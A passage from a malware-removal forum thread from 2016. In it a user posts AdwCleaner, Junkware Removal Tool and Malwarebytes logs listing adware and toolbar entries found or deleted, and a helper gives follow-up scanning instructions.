Key Found: HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Key Found: HKLM\SOFTWARE\Classes\CLSID\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}
Key Found: HKLM\SOFTWARE\Classes\Interface\{3408AC0D-510E-4808-8F7B-6B70B1F88534}
Key Found: HKLM\SOFTWARE\Classes\Interface\{7697BC38-D0FA-454B-AC75-968B4CCABFCE}
Key Found: HKLM\SOFTWARE\Classes\Interface\{E4E3E0F8-CD30-4380-8CE9-B96904BDEFCA}
Key Found: HKLM\SOFTWARE\Classes\Interface\{FE8A736F-4124-4D9C-B4B1-3B12381EFABE}
Key Found: HKLM\SOFTWARE\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
Key Found: HKLM\SOFTWARE\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
Key Found: HKLM\SOFTWARE\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{03771AEF-400D-4A13-B712-25878EC4A3F5}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{C9C5DEAF-0A1F-4660-8279-9EDFAD6FEFE1}
Key Found: HKLM\SOFTWARE\Classes\TypeLib\{F6C2BABA-9E4C-425F-9AEC-24AB8F2B640D}
Key Found: HKLM\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{DF780F87-FF2B-4DF8-92D0-73DB16A1543A}
Key Found: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96}
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Found: [x64] HKLM\SOFTWARE\LevelQualityWatcher
Key Found: [x64] HKLM\SOFTWARE\RrSavings
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\OB
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\SearchProtectINT
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\W3I
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\Companion
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\YFriendsBar
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\YahooPartnerToolbar
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\AppDataLow\Software\Rr Savings
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\AppDataLow\Software\Yahoo\Companion
Key Found: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Wajam
Key Found: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Yahoo\YFriendsBar
Key Found: HKCU\Software\OB
Key Found: HKCU\Software\SearchProtectINT
Key Found: HKCU\Software\W3I
Key Found: HKCU\Software\Yahoo\Companion
Key Found: HKCU\Software\Yahoo\YFriendsBar
Key Found: HKCU\Software\YahooPartnerToolbar
Key Found: HKCU\Software\AppDataLow\Software\Rr Savings
Key Found: HKCU\Software\AppDataLow\Software\Yahoo\Companion
Key Found: HKLM\SOFTWARE\Freeze.com
Key Found: HKLM\SOFTWARE\RrFilter
Key Found: HKLM\SOFTWARE\Viewpoint
Key Found: HKLM\SOFTWARE\W3I
Key Found: HKLM\SOFTWARE\Yahoo\Companion
Key Found: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Manager
Key Found: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}
Key Found: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\bizitool.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\hiphopmyway.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\metrolyrics.com
Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\veoh.com
Key Found: HKLM\SOFTWARE\Google\Chrome\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp

***** [ Web browsers ] *****

No malicious Firefox based browser items found.
Chrome pref Found: [C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Web data] - trovi.search

*************************

C:\AdwCleaner\AdwCleaner[S0].txt - [8300 Bytes] - [31/08/2016 12:20:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8373 Bytes] ##########

#11
[email protected]

Posted 31 August 2016 - 11:18 AM

Member

Topic Starter
Member
18 posts

junkware log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows ™ Vista Home Premium x64
Ran by JHS-JJS (Administrator) on Wed 08/31/2016 at 12:59:07.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 29

Successfully deleted: C:\ProgramData\aol toolbar (Folder)
Successfully deleted: C:\ProgramData\mntemp (File)
Successfully deleted: C:\ProgramData\w3i (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\aol toolbar (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\wajam (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\searchplugins\norton-safe-search.xml (File)
Successfully deleted: C:\Users\JHS-JJS\Documents\my pagemanager (Folder)
Successfully deleted: C:\Windows\system32\newsoft (File)
Successfully deleted: C:\Program Files (x86)\aol toolbar (Folder)
Successfully deleted: C:\Program Files (x86)\w3i (Folder)
Successfully deleted: C:\Program Files\002 (Folder)
Successfully deleted: C:\Program Files\aol toolbar (Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\71S8II66 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777EA2QE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QE8ANRR0 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLX83197 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S1DRQ0MV (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VDEX4EDG (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W1OL4E84 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\JHS-JJS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK181L0K (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\71S8II66 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\777EA2QE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QE8ANRR0 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RLX83197 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S1DRQ0MV (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VDEX4EDG (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W1OL4E84 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK181L0K (Temporary Internet Files Folder)

Deleted the following from C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\prefs.js
user_pref(browser.urlbar.suggest.searches, true);

Registry: 2

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\InstallIQUpdater (Registry Value)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 08/31/2016 at 13:03:52.25
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#12
zep516

Posted 31 August 2016 - 11:24 AM

Trusted Helper

Malware Removal
8,093 posts

Looking good.

Waiting for Malwarebytes log.

On adwCleaner
Please re-run it, click scan, let it scan again, scan finishes, click log file, log opens, click clean. No need to post log.

#13
[email protected]

Posted 31 August 2016 - 12:21 PM

Member

Topic Starter
Member
18 posts

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 8/31/2016
Scan Time: 2:09:39 PM
Logfile: malwarebytescan.txt
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.08.31.06
Rootkit Database: v2016.08.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x64
File System: NTFS
User: JHS-JJS

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 328871
Time Elapsed: 25 min, 29 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

#14
zep516

Posted 31 August 2016 - 12:24 PM

Trusted Helper

Malware Removal
8,093 posts

Is Norton still complaining ?

When you get time,

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

Double-click to run it. When the tool opens click Yes to disclaimer.
Make sure you checkmark Addition.txt box.
Press Scan button.
Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

#15
[email protected]

Posted 31 August 2016 - 12:31 PM

Member

Topic Starter
Member
18 posts

OK, ran adwCleaner again as instructed

Back to Virus, Spyware, Malware Removal · Next Unread Topic →

Also tagged with one or more of these keywords: Virus Spyware, Malware

Security → Virus, Spyware, Malware Removal → Possible Malware infection - help request [Solved] Started by Maffu , 07 May 2023 malware, advapi and 1 more... 1 2 3 4	Hot 51 replies 12,726 views	DR M 26 Jun 2023
Security → Virus, Spyware, Malware Removal → Help getting started checking laptop for malware [Solved] Started by triedeverything , 12 Apr 2023 help, malware, spyware 1 2	Hot 19 replies 5,789 views	DR M 16 Apr 2023
Security → Virus, Spyware, Malware Removal → Checkmate Ransomware detection / removal? Started by JcTcom , 18 Aug 2022 Checkmate, Ransomware, Virus and 5 more...	0 replies 1,863 views	JcTcom 18 Aug 2022
Security → Virus, Spyware, Malware Removal → Getting a warning over & over but not getting it clean [Solved] Started by Phlegmbot , 28 Mar 2022 malware, spyware, redirect 1 2	Hot 21 replies 6,790 views	DR M 10 Apr 2022
Security → Virus, Spyware, Malware Removal → PC keeps hanging and restarting on its own [Closed] Started by lolx21341 , 29 Jan 2022 Hanging, Restarting, Virus and 2 more...	3 replies 3,600 views	DR M 03 Feb 2022